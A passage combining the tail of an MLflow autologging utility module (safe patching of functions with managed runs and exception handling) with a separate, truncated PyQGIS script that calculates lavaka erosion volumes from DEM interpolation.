``` # TypeError: metaclass conflict: the metaclass of a derived class must be # a (non-strict) subclass of the metaclasses of all its bases. # ``` # # To avoid this error, create `ExceptionSafeAbstractClass` that is based on `abc.ABCMeta`. 
ExceptionSafeAbstractClass = _exception_safe_class_factory(abc.ABCMeta) class PatchFunction: """ Base class representing a function patch implementation with a callback for error handling. `PatchFunction` should be subclassed and used in conjunction with `safe_patch` to safely modify the implementation of a function. Subclasses of `PatchFunction` should use `_patch_implementation` to define modified ("patched") function implementations and `_on_exception` to define cleanup logic when `_patch_implementation` terminates due to an unhandled exception. """ @abstractmethod def _patch_implementation(self, original, *args, **kwargs): """ Invokes the patch function code. :param original: The original, underlying function over which the `PatchFunction` is being applied. :param *args: The positional arguments passed to the original function. :param **kwargs: The keyword arguments passed to the original function. """ pass @abstractmethod def _on_exception(self, exception): """ Called when an unhandled standard Python exception (i.e. an exception inheriting from `Exception`) or a `KeyboardInterrupt` prematurely terminates the execution of `_patch_implementation`. :param exception: The unhandled exception thrown by `_patch_implementation`. """ pass @classmethod def call(cls, original, *args, **kwargs): return cls().__call__(original, *args, **kwargs) def __call__(self, original, *args, **kwargs): try: return self._patch_implementation(original, *args, **kwargs) except (Exception, KeyboardInterrupt) as e: try: self._on_exception(e) finally: # Regardless of what happens during the `_on_exception` callback, reraise # the original implementation exception once the callback completes raise e def with_managed_run(autologging_integration, patch_function, tags=None): """ Given a `patch_function`, returns an `augmented_patch_function` that wraps the execution of `patch_function` with an active MLflow run. The following properties apply: - An MLflow run is only created if there is no active run present when the patch function is executed - If an active run is created by the `augmented_patch_function`, it is terminated with the `FINISHED` state at the end of function execution - If an active run is created by the `augmented_patch_function`, it is terminated with the `FAILED` if an unhandled exception is thrown during function execution Note that, if nested runs or non-fluent runs are created by `patch_function`, `patch_function` is responsible for terminating them by the time it terminates (or in the event of an exception). :param autologging_integration: The autologging integration associated with the `patch_function`. :param patch_function: A `PatchFunction` class definition or a function object compatible with `safe_patch`. :param tags: A dictionary of string tags to set on each managed run created during the execution of `patch_function`. 
""" def create_managed_run(): managed_run = mlflow.start_run() if tags: try_mlflow_log(mlflow.set_tags, tags) _logger.info( "Created MLflow autologging run with ID '%s', which will track hyperparameters," " performance metrics, model artifacts, and lineage information for the" " current %s workflow", managed_run.info.run_id, autologging_integration, ) return managed_run if inspect.isclass(patch_function): class PatchWithManagedRun(patch_function): def __init__(self): super(PatchWithManagedRun, self).__init__() self.managed_run = None def _patch_implementation(self, original, *args, **kwargs): if not mlflow.active_run(): self.managed_run = try_mlflow_log(create_managed_run) result = super(PatchWithManagedRun, self)._patch_implementation( original, *args, **kwargs ) if self.managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FINISHED)) return result def _on_exception(self, e): if self.managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FAILED)) super(PatchWithManagedRun, self)._on_exception(e) return PatchWithManagedRun else: def patch_with_managed_run(original, *args, **kwargs): managed_run = None if not mlflow.active_run(): managed_run = try_mlflow_log(create_managed_run) try: result = patch_function(original, *args, **kwargs) except (Exception, KeyboardInterrupt): # In addition to standard Python exceptions, handle keyboard interrupts to ensure # that runs are terminated if a user prematurely interrupts training execution # (e.g. via sigint / ctrl-c) if managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FAILED)) raise else: if managed_run: try_mlflow_log(mlflow.end_run, RunStatus.to_string(RunStatus.FINISHED)) return result return patch_with_managed_run def is_testing(): """ Indicates whether or not autologging functionality is running in test mode (as determined by the `MLFLOW_AUTOLOGGING_TESTING` environment variable). Test mode performs additional validation during autologging, including: - Checks for the exception safety of arguments passed to model training functions (i.e. all additional arguments should be "exception safe" functions or classes) - Disables exception handling for patched function logic, ensuring that patch code executes without errors during testing """ return os.environ.get(_AUTOLOGGING_TEST_MODE_ENV_VAR, "false") == "true" def safe_patch( autologging_integration, destination, function_name, patch_function, manage_run=False ): """ Patches the specified `function_name` on the specified `destination` class for autologging purposes, preceding its implementation with an error-safe copy of the specified patch `patch_function` with the following error handling behavior: - Exceptions thrown from the underlying / original function (`<destination>.<function_name>`) are propagated to the caller. - Exceptions thrown from other parts of the patched implementation (`patch_function`) are caught and logged as warnings. :param autologging_integration: The name of the autologging integration associated with the patch. :param destination: The Python class on which the patch is being defined. :param function_name: The name of the function to patch on the specified `destination` class. :param patch_function: The patched function code to apply. This is either a `PatchFunction` class definition or a function object. If it is a function object, the first argument should be reserved for an `original` method argument representing the underlying / original function. 
Subsequent arguments should be identical to those of the original function being patched. :param manage_run: If `True`, applies the `with_managed_run` wrapper to the specified `patch_function`, which automatically creates & terminates an MLflow active run during patch code execution if necessary. If `False`, does not apply the `with_managed_run` wrapper to the specified `patch_function`. """ from mlflow.utils.autologging_utils import get_autologging_config, autologging_is_disabled if manage_run: patch_function = with_managed_run( autologging_integration, patch_function, tags={MLFLOW_AUTOLOGGING: autologging_integration}, ) patch_is_class = inspect.isclass(patch_function) if patch_is_class: assert issubclass(patch_function, PatchFunction) else: assert callable(patch_function) def safe_patch_function(*args, **kwargs): """ A safe wrapper around the specified `patch_function` implementation designed to handle exceptions thrown during the execution of `patch_function`. This wrapper distinguishes exceptions thrown from the underlying / original function (`<destination>.<function_name>`) from exceptions thrown from other parts of `patch_function`. This distinction is made by passing an augmented version of the underlying / original function to `patch_function` that uses nonlocal state to track whether or not it has been executed and whether or not it threw an exception. Exceptions thrown from the underlying / original function are propagated to the caller, while exceptions thrown from other parts of `patch_function` are caught and logged as warnings. """ #
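The safe_patch docstring is cut off above, but the contract it relies on is already visible: a PatchFunction subclass supplies _patch_implementation and _on_exception. A hypothetical subclass, written as if it lived in this module (so PatchFunction, try_mlflow_log, mlflow, _logger and safe_patch are in scope), might look like the sketch below; SomeEstimator and its n_estimators attribute are illustrative assumptions, not a real integration.

# Hypothetical example, not part of MLflow itself.
class LogFitParams(PatchFunction):
    def _patch_implementation(self, original, *args, **kwargs):
        # Log a hyperparameter (assumed to exist on the estimator) before delegating
        # to the original, underlying training routine.
        estimator = args[0] if args else None
        try_mlflow_log(mlflow.log_param, "n_estimators", getattr(estimator, "n_estimators", None))
        return original(*args, **kwargs)

    def _on_exception(self, exception):
        # Cleanup hook; PatchFunction.__call__ re-raises the exception afterwards.
        _logger.warning("Patched fit() failed: %s", exception)

# Hypothetical wiring for some third-party `SomeEstimator.fit`:
# safe_patch("some_flavor", SomeEstimator, "fit", LogFitParams, manage_run=True)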
#################################################################################
#-------------------------------------------------------------------------------#
# LAVAKA VOLUME DETERMINATION
#-------------------------------------------------------------------------------#
#################################################################################
# This PyQGIS script is written by <NAME> in QGIS version 3.8.1 with GRASS
# 7.6.1. This script is used to reconstruct the original topography around a
# lavaka and to calculate the lavaka volume as the difference between the
# reconstructed topography and the current topography.
# The input files and the different steps to obtain the volumes are described below.
# Folder paths and file names will have to be adapted to the user's names.
# last changes made: 02/8/2021
# contact: <EMAIL>

#################################################################################
# STEP 0: READ IN THE SHAPEFILES
#################################################################################
# As a first step the necessary folder paths are set and the three required
# input files are loaded:
# 1) shapefile containing the digitized lavaka outlines: 'Lavaka.shp'
# 2) shapefile containing a pre-erosion surface polygon for each lavaka: 'Poly_OriSurf.shp'
# 3) DEM raster file: 'DEM.tif'
# All files are in UTM coordinates. The ID of the pre-erosion polygons must
# correspond with the id (first part of the name) of the lavaka polygon.

import os

# Set the folder in which all files are stored and make this the working directory
path = 'C:/Folder/subfolder/.../Lavaka_Volumes/example/'
os.chdir(path)

# Read in the files
DEM = path+'SRTM.tif'
poly_surf = path+'poly_OriginalSurf.shp'
lavaka = path+'lavaka.shp'

# load the shapefile layers
lavaka_layer = QgsVectorLayer(lavaka, 'lavaka', 'ogr')
poly_layer = QgsVectorLayer(poly_surf, 'poly', 'ogr')

# Set the interpolation method (Spline = 1 or TIN = 2)
interpol_method = 2

################################################################################
# TO CHECK BEFORE CONTINUING
################################################################################
# Some final checks before starting the analysis:
# 1. check if the shapefile layers are correctly loaded
if not lavaka_layer.isValid():
    print("Lavaka layer failed to load!")
if not poly_layer.isValid():
    print("Poly layer failed to load!")

# 2. check if the x and y resolution of the DEM are EXACTLY the same.
#    (Properties -> Information -> Pixel Size)
#    If not: warp (reproject) -> define the resolution and save the DEM
# 3. check if the lavaka polygon layer has a field 'id'.
#    If not: create the id field and fill it with the id's by using the code below

# Create field 'id':
from PyQt5.QtCore import QVariant
layer_provider = lavaka_layer.dataProvider()
layer_provider.addAttributes([QgsField("id", QVariant.Double)])
lavaka_layer.updateFields()
print(lavaka_layer.fields().names())

# fill the field with the id's which are extracted from the names
# (the name of each lavaka starts with its id)
lavaka_layer.startEditing()
for feature in lavaka_layer.getFeatures():
    name = feature['Name']
    name_split = name.split("_")[0]
    feature['id'] = name_split
    lavaka_layer.updateFeature(feature)
lavaka_layer.commitChanges()   # commit the edit session so the id values are saved

################################################################################
# STEP 1: CREATE POINTS IN PRE-EROSION POLYGON
################################################################################
# Create a new folder called 'randomPoints' in the main folder. In this folder
# the layers containing the random points will be stored.

# add the layer to the project without adding it to the layer tree
QgsProject.instance().addMapLayer(poly_layer, False)

# loop through all the features of the polygon layer to get the correct ID's;
# use i as an index to select each feature of the shapefile
i = 0
for feature in poly_layer.getFeatures():
    ID = feature['ID']
    print(ID)
    poly_layer.select(i)
    # set input params
    params = {'INPUT':QgsProcessingFeatureSourceDefinition(poly_layer.id(), True),
              'STRATEGY':0,
              'EXPRESSION':' $area /20',
              'MIN_DISTANCE':1,
              'OUTPUT': path+'randomPoints/'+str(ID)+'_random_points.shp'}
    processing.run("qgis:randompointsinsidepolygons", params)
    # Remove the current selection and then pass to the next one
    poly_layer.removeSelection()
    i = i+1

################################################################################
# STEP 2: ASSIGN DEM-VALUES TO POINTS
################################################################################
# Create a new folder called 'randomPointsDEM' in the main folder. In this folder
# the layers containing the random points with assigned DEM values will be stored.

# loop through all the files of folder randomPoints
for file in os.listdir(path+'randomPoints'):
    filename = os.fsdecode(file)
    # run the algorithm for all the .shp layers
    if filename.endswith(".shp"):
        print(filename)
        params = {'SHAPES':path+'randomPoints/'+filename,
                  'GRIDS':[DEM],
                  'RESAMPLING':0,
                  'RESULT': path+'randomPointsDEM/'+filename[0:-4]+'_DEM.shp'}
        processing.run("saga:addrastervaluestopoints", params)

################################################################################
# STEP 3: INTERPOLATE THE PRE-EROSION SURFACE
################################################################################
# Two interpolation methods are used: Spline and TIN interpolation.
# The method that will be applied to the data is set in the beginning of the script
# (interpol_method = 1 or 2. 1 = Spline, 2 = TIN).

# 1. SPLINE INTERPOLATION
# Create a new folder called 'SPLINEinterpol' in the main folder.
In this folder # the layers containing the interpolated surfaces will be stored # 'zcolumn': Verify the name of the height attribute of the randomPointsDEM layer that # was created in the previous step, this name has to be filled in for 'zcolumn' # 'GRASS_REGION_CELLSIZE_PARAMETER': equal to the resolution of the DEM # (TanDEM-X: 12 m, SRTM: 30 m, UAV-SfM: 0.20 m) if interpol_method == 1: # loop through all the files of folder randomPointsDEM for file in os.listdir(path+'randomPointsDEM'): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".shp"): print(filename) # get the extend of the layer params = {'input':path +'randomPointsDEM/'+filename, 'zcolumn':'SRTM', 'where':'', 'mask':None, 'tension':40, 'smooth':None, 'smooth_column':None, 'segmax':40, 'npmin':300, 'dmin':None, 'dmax':None, 'zscale':1, 'theta':None, 'scalex':None, '-t':False, '-d':False, 'elevation':path+'SPLINEinterpol/'+ filename.split("_")[0]+'_spline.tif', 'aspect':'TEMPORARY_OUTPUT', 'pcurvature':'TEMPORARY_OUTPUT', 'tcurvature':'TEMPORARY_OUTPUT', 'mcurvature':'TEMPORARY_OUTPUT', 'deviations':'TEMPORARY_OUTPUT', 'treeseg':'TEMPORARY_OUTPUT', 'overwin':'TEMPORARY_OUTPUT', 'GRASS_REGION_PARAMETER':None, 'GRASS_REGION_CELLSIZE_PARAMETER':30.49, 'GRASS_RASTER_FORMAT_OPT':'', 'GRASS_RASTER_FORMAT_META':'', 'GRASS_SNAP_TOLERANCE_PARAMETER':-1, 'GRASS_MIN_AREA_PARAMETER':0.0001, 'GRASS_OUTPUT_TYPE_PARAMETER':0, 'GRASS_VECTOR_DSCO':'', 'GRASS_VECTOR_LCO':'', 'GRASS_VECTOR_EXPORT_NOCAT':False} processing.run("grass7:v.surf.rst",params) # 2. TIN interpolation # Create a new folder called 'TINinterpol' to the main folder. In this folder # the layers containing the interpolated surfaces will be stored # 'PIXEL_SIZE = set to the pixel size of the DEM # (TanDEM-X: 12 m, SRTM: 30 m, UAV-SfM: 0.20 m) if interpol_method == 2: # loop through all the files of folder randomPointsDEM for file in os.listdir(path+'randomPointsDEM'): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".shp"): print(filename) # get the extend of the layer pointsDEM = QgsVectorLayer(path+'randomPointsDEM/'+filename, '', 'ogr') ext = pointsDEM.extent() xmin = ext.xMinimum() xmax = ext.xMaximum() ymin = ext.yMinimum() ymax = ext.yMaximum() params = {'INTERPOLATION_DATA':path +'randomPointsDEM/'+filename+'::~::0::~::1::~::0', 'METHOD':0, 'EXTENT':str(xmin)+','+str(xmax)+','+str(ymin)+','+str(ymax)+' [EPSG:32739]', 'PIXEL_SIZE':30.49, 'OUTPUT':path+'TINinterpol/'+ filename.split("_")[0]+'_interpol.tif'} processing.run("qgis:tininterpolation",params) ################################################################################ # STEP 4: CALCULATE ELEVATION DIFFERENCE ################################################################################ # substract the original DEM from the interpolated DEM to get the heigh difference # import the necesarry toolboxes from qgis.analysis import QgsRasterCalculator, QgsRasterCalculatorEntry # load the DEM layer DEM_layer = QgsRasterLayer(DEM,"DEM_layer") if not DEM_layer.isValid(): print("DEM_layer failed to load!") entries = [] boh2 = QgsRasterCalculatorEntry() boh2.ref = 'boh2@1' boh2.raster = DEM_layer boh2.bandNumber = 1 entries.append( boh2 ) # folder names depend on the interpolation method if interpol_method == 1: # Create a new folder called 'DEM_dif_SPLINE' to the main folder. 
In this folder # the layers containing the DEM difference layers based on the SPLINE method will be stored inputFolder = path + 'SPLINEinterpol' outputFolder = path + 'DEM_dif_SPLINE/' if interpol_method == 2: # Create a new folder called 'DEM_dif_TIN' to the main folder. In this folder # the layers containing the DEM difference layers based on the TIN method will be stored inputFolder = path+'TINinterpol' outputFolder = path + 'DEM_dif_TIN/' # loop through all the files of the folder in which the interpolation results # are stored for file in os.listdir(inputFolder): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".tif"): print(filename) interpolLayer = QgsRasterLayer(inputFolder+'/'+filename,"interpolLayer") if not interpolLayer.isValid(): print("interpolLayer failed to load!") boh1 = QgsRasterCalculatorEntry() boh1.ref = 'boh1@1' boh1.raster = interpolLayer boh1.bandNumber = 1 entries.append( boh1 ) # Process calculation with input extent and resolution calc = QgsRasterCalculator('(boh1@1 - boh2@1)',outputFolder+'/'+filename.split("_")[0]+'_DEM_dif.tif','GTiff', interpolLayer.extent(), interpolLayer.width(), interpolLayer.height(), entries ) calc.processCalculation() #remove the latest added entry del entries [1] ################################################################################ # STEP 5: ELEVATION DIFFERENCE CLIPPED TO LAVAKA EXTENT ################################################################################ # folder names depend on the interpolation method if interpol_method == 1: # Create a new folder called 'Clipped_SPLINE' to the main folder. In this folder # the layers containing the clipped DEM difference layers based on the SPLINE method will be stored inputFolder = path + 'DEM_dif_SPLINE' outputFolder = path + 'Clipped_SPLINE/' if interpol_method == 2: # Create a new folder called 'Clipped_TIN' to the main folder. In this folder # the layers containing the clipped DEM difference layers based on the TIN method will be stored inputFolder = path + 'DEM_dif_TIN' outputFolder = path + 'Clipped_TIN/' # loop through all the files of DEM dif (= all the files for which the polygons are drawn) for file in os.listdir(inputFolder): filename = os.fsdecode(file) # run the algorithm for all the .shp layers if filename.endswith(".tif"): print(filename) ID1 = filename.split("_")[0] print(ID1) query = '"ID" = '+str(ID1) selection = lavaka_layer.getFeatures(QgsFeatureRequest().setFilterExpression(query)) lavaka_layer.selectByIds([s.id() for s in selection]) lavaka_layer.selectedFeatures() QgsProject.instance().addMapLayer(lavaka_layer, False) params = {'INPUT':inputFolder+'/'+filename, 'POLYGONS':QgsProcessingFeatureSourceDefinition(lavaka_layer.id(), True), 'OUTPUT':outputFolder+str(ID1)+'_DEMdif_clipped.sdat'} processing.run("saga:cliprasterwithpolygon",params) ################################################################################ # STEP 6: EXPORT RESULTS ################################################################################ # folder names depend on the interpolation method if interpol_method == 1: # Create a new folder called 'ClippedRasterValues_SPLINE' to the main folder. In this folder # the
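The script is cut off inside STEP 6, so the export of the volume results is not shown. One plausible way to finish the workflow, sketched here as an assumption rather than the author's own STEP 6, is to sum each clipped elevation-difference raster and multiply by the cell area; folder and file naming follow the TIN pattern used above, and the '.sdat' rasters are assumed to be readable through GDAL.

# Hypothetical continuation: derive a volume per lavaka from the clipped difference rasters
from qgis.core import QgsRasterLayer, QgsRasterBandStats

clipped_folder = path + 'Clipped_TIN'      # use 'Clipped_SPLINE' when interpol_method == 1
volumes = {}
for file in os.listdir(clipped_folder):
    filename = os.fsdecode(file)
    if filename.endswith('.sdat'):
        layer = QgsRasterLayer(clipped_folder + '/' + filename, filename)
        if not layer.isValid():
            print(filename + ' failed to load!')
            continue
        stats = layer.dataProvider().bandStatistics(1, QgsRasterBandStats.All)
        cell_area = layer.rasterUnitsPerPixelX() * layer.rasterUnitsPerPixelY()
        # sum of height differences times cell area; m3 if the map units are metres
        volumes[filename.split('_')[0]] = stats.sum * cell_area
print(volumes)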